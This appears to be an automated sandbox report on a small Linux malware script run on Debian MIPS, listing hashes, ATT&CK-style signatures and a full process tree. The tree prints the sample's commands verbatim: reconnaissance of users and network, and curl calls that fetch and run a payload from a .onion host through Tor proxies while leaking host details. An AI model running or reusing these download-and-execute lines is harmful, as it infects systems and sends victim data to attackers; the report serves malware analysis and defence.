Analysis
-
max time kernel
124s -
max time network
138s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
24/10/2024, 18:05
Static task
static1
Behavioral task
behavioral1
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
Resource
debian9-mipsel-20240226-en
General
-
Target
74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118
-
Size
1KB
-
MD5
74accae8c7e0093939ab4e0cd1c2a7fd
-
SHA1
ae3b26988c72634e3f0daeb6486332530ba58324
-
SHA256
d5b4d0376c9b07f5be237d0e47aa9aa321489917d30559328e544c5d0347e5ea
-
SHA512
7e784dce4b2fa0f5a3659ccf7af43b3f4886bd5ea32acb26a60ccad38c5bc918789d7d01f2090bd3a053d783c6eba4571865f7e54de106232d83cae57e4172b9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 720 chmod 772 chmod 815 chmod 869 chmod 876 chmod -
Executes dropped EXE 2 IoCs
ioc pid Process /tmp/i 722 i /tmp/i 877 i -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 checkip.amazonaws.com 17 checkip.amazonaws.com 24 checkip.amazonaws.com 3 checkip.amazonaws.com -
Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs
Adversaries may deobfuscate or decode files or information to evade detection mechanisms.
pid Process 700 base64 -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems crontab File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems ls File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems id File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/self/maps awk File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems crontab File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems ls File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/maps awk File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 15 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 903 curl 749 curl 811 curl 813 curl 850 ip 770 curl 860 curl 865 curl 923 curl 912 ip 759 ip 768 curl 797 curl 839 curl 803 ip -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/i bash
Processes
-
/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes118/tmp/74accae8c7e0093939ab4e0cd1c2a7fd_JaffaCakes1181⤵PID:696
-
/bin/bashbash2⤵
- Writes file to tmp directory
PID:701 -
/usr/bin/cutcut -d: -f63⤵PID:708
-
-
/usr/bin/idid -u3⤵
- Reads runtime system information
PID:710
-
-
/bin/grepgrep x:0: /etc/passwd3⤵PID:707
-
-
/usr/bin/headhead -n 1 /tmp/.X11-unix/013⤵PID:716
-
-
/bin/lsls /proc//status3⤵
- Reads runtime system information
PID:717
-
-
/bin/chmodchmod +x ./i3⤵
- File and Directory Permissions Modification
PID:720
-
-
/tmp/i./i3⤵
- Executes dropped EXE
PID:722
-
-
/bin/rmrm -f i3⤵PID:723
-
-
/bin/grepgrep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"3⤵PID:728
-
-
/usr/bin/trtr " " "\\n"3⤵PID:729
-
-
/usr/bin/sortsort -uR3⤵PID:731
-
-
/usr/bin/headhead -n 13⤵PID:732
-
-
/bin/grepgrep -Ev "[.]0"3⤵PID:730
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 "https://doh-fi.blahdns.com/dns-query?name=relay.tor2socks.in"3⤵
- Reads runtime system information
PID:727
-
-
/bin/unameuname -m3⤵PID:743
-
-
/bin/datedate3⤵PID:745
-
-
/usr/bin/md5summd5sum3⤵PID:746
-
-
/usr/bin/cutcut -f1 -d-3⤵PID:747
-
-
/usr/bin/curlcurl -4fsSLk checkip.amazonaws.com3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:749
-
-
/usr/bin/whoamiwhoami3⤵PID:755
-
-
/bin/unameuname -m3⤵PID:756
-
-
/bin/unameuname -n3⤵PID:757
-
-
/bin/grepgrep "inet "3⤵PID:760
-
-
/usr/bin/md5summd5sum3⤵PID:762
-
-
/usr/bin/awkawk "{print \$1}"3⤵
- Reads runtime system information
PID:763
-
-
/sbin/ipip a3⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/awkawk "{print \$2}"3⤵
- Reads runtime system information
PID:761
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:766
-
-
/usr/bin/base64base64 -w03⤵PID:767
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:768
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./3d4e2c62a0f0444c5e39a768425ab056 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:770
-
-
/bin/chmodchmod +x ./3d4e2c62a0f0444c5e39a768425ab0563⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/3d4e2c62a0f0444c5e39a768425ab056./3d4e2c62a0f0444c5e39a768425ab0563⤵PID:773
-
-
/bin/rmrm -f ./3d4e2c62a0f0444c5e39a768425ab0563⤵PID:774
-
-
/usr/bin/headhead -n 1 /tmp/.X11-unix/013⤵PID:775
-
-
/bin/lsls /proc//status3⤵
- Reads runtime system information
PID:776
-
-
/bin/grepgrep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"3⤵PID:781
-
-
/usr/bin/trtr " " "\\n"3⤵PID:782
-
-
/usr/bin/sortsort -uR3⤵PID:784
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 "https://doh.no.ahadns.net/dns-query?name=relay.tor2socks.in"3⤵
- Reads runtime system information
PID:780
-
-
/usr/bin/headhead -n 13⤵PID:785
-
-
/bin/grepgrep -Ev "[.]0"3⤵PID:783
-
-
/bin/unameuname -m3⤵PID:791
-
-
/usr/bin/cutcut -f1 -d-3⤵PID:795
-
-
/bin/datedate3⤵PID:793
-
-
/usr/bin/md5summd5sum3⤵PID:794
-
-
/usr/bin/curlcurl -4fsSLk checkip.amazonaws.com3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:797
-
-
/usr/bin/whoamiwhoami3⤵PID:799
-
-
/bin/unameuname -m3⤵PID:800
-
-
/bin/unameuname -n3⤵PID:801
-
-
/sbin/ipip a3⤵
- System Network Configuration Discovery
PID:803
-
-
/bin/grepgrep "inet "3⤵PID:804
-
-
/usr/bin/md5summd5sum3⤵PID:806
-
-
/usr/bin/awkawk "{print \$2}"3⤵
- Reads runtime system information
PID:805
-
-
/usr/bin/awkawk "{print \$1}"3⤵
- Reads runtime system information
PID:807
-
-
/usr/bin/base64base64 -w03⤵PID:810
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:809
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:811
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./b18c7b90793d1614c38108eb109f833e -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:813
-
-
/bin/chmodchmod +x ./b18c7b90793d1614c38108eb109f833e3⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/b18c7b90793d1614c38108eb109f833e./b18c7b90793d1614c38108eb109f833e3⤵PID:816
-
-
/bin/rmrm -f ./b18c7b90793d1614c38108eb109f833e3⤵PID:817
-
-
/usr/bin/headhead -n 1 /tmp/.X11-unix/013⤵PID:818
-
-
/bin/lsls /proc//status3⤵
- Reads runtime system information
PID:819
-
-
/bin/grepgrep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"3⤵PID:824
-
-
/usr/bin/trtr " " "\\n"3⤵PID:825
-
-
/bin/grepgrep -Ev "[.]0"3⤵PID:826
-
-
/usr/bin/sortsort -uR3⤵PID:827
-
-
/usr/bin/headhead -n 13⤵PID:828
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 "https://uncensored.lux1.dns.nixnet.xyz/dns-query?name=relay.tor2socks.in"3⤵
- Reads runtime system information
PID:823
-
-
/bin/unameuname -m3⤵PID:832
-
-
/bin/datedate3⤵PID:834
-
-
/usr/bin/md5summd5sum3⤵PID:835
-
-
/usr/bin/cutcut -f1 -d-3⤵PID:836
-
-
/usr/bin/curlcurl -4fsSLk checkip.amazonaws.com3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:839
-
-
/usr/bin/whoamiwhoami3⤵PID:844
-
-
/bin/unameuname -m3⤵PID:846
-
-
/bin/unameuname -n3⤵PID:847
-
-
/sbin/ipip a3⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/grepgrep "inet "3⤵PID:851
-
-
/usr/bin/awkawk "{print \$2}"3⤵
- Reads runtime system information
PID:852
-
-
/usr/bin/md5summd5sum3⤵PID:853
-
-
/usr/bin/awkawk "{print \$1}"3⤵
- Reads runtime system information
PID:854
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:857
-
-
/usr/bin/base64base64 -w03⤵PID:858
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 -x socks5h://:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:860
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.tor2web.in/int.mips -o./5f3b49ef027eb052018f97a43d59ca89 -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod +x ./5f3b49ef027eb052018f97a43d59ca893⤵
- File and Directory Permissions Modification
PID:869
-
-
/dev/shm/5f3b49ef027eb052018f97a43d59ca89./5f3b49ef027eb052018f97a43d59ca893⤵PID:870
-
-
/bin/rmrm -f ./5f3b49ef027eb052018f97a43d59ca893⤵PID:871
-
-
/usr/bin/headhead -n 1 /tmp/.X11-unix/013⤵PID:873
-
-
/bin/lsls /proc//status3⤵
- Reads runtime system information
PID:875
-
-
/bin/chmodchmod +x ./i3⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/i./i3⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm -f i3⤵PID:878
-
-
/bin/grepgrep -oE "\\b([0-9]{1,3}\\.){3}[0-9]{1,3}\\b"3⤵PID:883
-
-
/usr/bin/trtr " " "\\n"3⤵PID:884
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 "https://dns.twnic.tw/dns-query?name=relay.tor2socks.in"3⤵
- Reads runtime system information
PID:882
-
-
/usr/bin/headhead -n 13⤵PID:887
-
-
/usr/bin/sortsort -uR3⤵PID:886
-
-
/bin/grepgrep -Ev "[.]0"3⤵PID:885
-
-
/bin/unameuname -m3⤵PID:896
-
-
/bin/datedate3⤵PID:898
-
-
/usr/bin/md5summd5sum3⤵PID:899
-
-
/usr/bin/cutcut -f1 -d-3⤵PID:900
-
-
/usr/bin/curlcurl -4fsSLk checkip.amazonaws.com3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/whoamiwhoami3⤵PID:907
-
-
/bin/unameuname -m3⤵PID:908
-
-
/bin/unameuname -n3⤵PID:910
-
-
/sbin/ipip a3⤵
- System Network Configuration Discovery
PID:912
-
-
/bin/grepgrep "inet "3⤵PID:913
-
-
/usr/bin/md5summd5sum3⤵PID:915
-
-
/usr/bin/awkawk "{print \$2}"3⤵
- Reads runtime system information
PID:914
-
-
/usr/bin/awkawk "{print \$1}"3⤵
- Reads runtime system information
PID:916
-
-
/usr/bin/crontabcrontab -l3⤵
- Reads runtime system information
PID:919
-
-
/usr/bin/base64base64 -w03⤵PID:920
-
-
/usr/bin/curlcurl -4fsSLkA- -m200 -x socks5h://5.10.228.248:9050 ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion/int.mips -o./1b8f4bb809b6d9f7810d0d4d1656553c -e138.199.29.44_root_mips_debian9-mipsel-20240226-en-12_d41d8cd98f00b204e9800998ecf8427e_3⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:923
-
-
-
/usr/bin/base64base64 -d2⤵
- Deobfuscate/Decode Files or Information
PID:700
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5B
MD5f4b524261fce06c1fbd10b4681ad0b97
SHA1c595d1a14f6aa42cc1aa7ab4416c39ada07ca89d
SHA2569577a8bfed904bd55390ba203f1a233be1981b36fa945537eb3be5b2446de031
SHA512ab280f109ee7dcfb8031e160d0235e9bfb72cabde44b21355d9e6db2873530d8537e3bdbb8faf6cd8d6b3eac33f58de7694201b93f277d0b587bf2534df14449